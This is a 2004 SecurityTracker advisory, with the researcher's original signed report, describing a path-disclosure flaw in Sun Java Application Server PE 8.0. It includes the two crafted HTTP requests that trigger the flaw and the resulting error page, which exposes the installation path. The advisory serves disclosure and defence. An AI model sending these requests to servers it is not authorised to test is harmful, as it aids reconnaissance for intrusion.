Sun Java Application Server Discloses Installation Path to Remote Users
|
|
SecurityTracker Alert ID: 1010321
|
|
SecurityTracker URL: http://securitytracker.com/id?1010321
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Aug 25 2004
|
Original Entry Date: May 27 2004
|
Impact: Disclosure of system information
|
Exploit Included: Yes
|
Version(s): PE 8.0
|
Description: An information disclosure vulnerability was reported in the Sun Java Application Server. A remote user can determine the installation path.
Marc Schoenefeld reported that a remote user can submit the following type of requests to the target system to cause the system to disclose the installation path:
http://[target]:8080////
http://[target]:8080////CON
|
Impact: A remote user can determine the installation path.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.sun.com/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Linux (Red Hat Enterprise), Linux (Red Hat Linux), Linux (Sun), UNIX (Solaris - SunOS), Windows (2000), Windows (XP)
|
Underlying OS Comments: Tested on Microsoft Windows
|
Reported By: Marc Schoenefeld <schonef@uni-muenster.de>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 27 May 2004 02:10:50 +0200 (MES)
From: Marc Schoenefeld <schonef@uni-muenster.de>
Subject: Sun-Java-App-Server PE 8.0 path disclosure
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi,
when doing the following requests consequently against a Sun-Java-App-Server
PE 8.0 a Windows Box
http://127.0.0.1:8080////
http://127.0.0.1:8080////CON
you get a HTTP 500 Error, which reveals the installation path and the fact
that the server is running on a WinDos box (see details below) ....
Cheers
Marc
HTTP Status 500 -
type Exception report
message
description The server encountered an internal error () that prevented it
from fulfilling this request.
exception
java.io.FileNotFoundException:
C:\Programme\Sun\AppServer\domains\domain1\docroot\CON (Zugriff verweigert)
java.io.FileInputStream.open(Native
Method)
java.io.FileInputStream.(FileInputStream.java:106)
org.apache.naming.resources.FileDirContext$FileResource.streamContent(FileDirContext.java:1060)
org.apache.catalina.servlets.DefaultServlet$ResourceInfo.getStream(DefaultServlet.java:2504)
org.apache.catalina.servlets.DefaultServlet.copy(DefaultServlet.java:1938)
org.apache.catalina.servlets.DefaultServlet.serveResource(DefaultServlet.java:1057)
org.apache.catalina.servlets.DefaultServlet.doGet(DefaultServlet.java:518)
javax.servlet.http.HttpServlet.service(HttpServlet.java:748)
javax.servlet.http.HttpServlet.service(HttpServlet.java:861)
sun.reflect.GeneratedMethodAccessor67.invoke(Unknown
Source)
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
java.lang.reflect.Method.invoke(Method.java:324)
org.apache.catalina.security.SecurityUtil$1.run(SecurityUtil.java:289)
java.security.AccessController.doPrivileged(Native
Method)
javax.security.auth.Subject.doAsPrivileged(Subject.java:500)
org.apache.catalina.security.SecurityUtil.execute(SecurityUtil.java:311)
org.apache.catalina.security.SecurityUtil.doAsPrivilege(SecurityUtil.java:205)
note The full stack trace of the root cause is available in the
Sun-Java-System/Application-Server-PE-8.0 logs.
Sun-Java-System/Application-Server-PE-8.0
- --
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (AIX)
iD8DBQFAtTIPqCaQvrKNUNQRAptIAJ0YV+gpcM3yyffoLKe5l2eLcESytwCfdggj
drtNJzHEUkeMF/v+o2VaDw4=
=/RwK
-----END PGP SIGNATURE-----
|
|
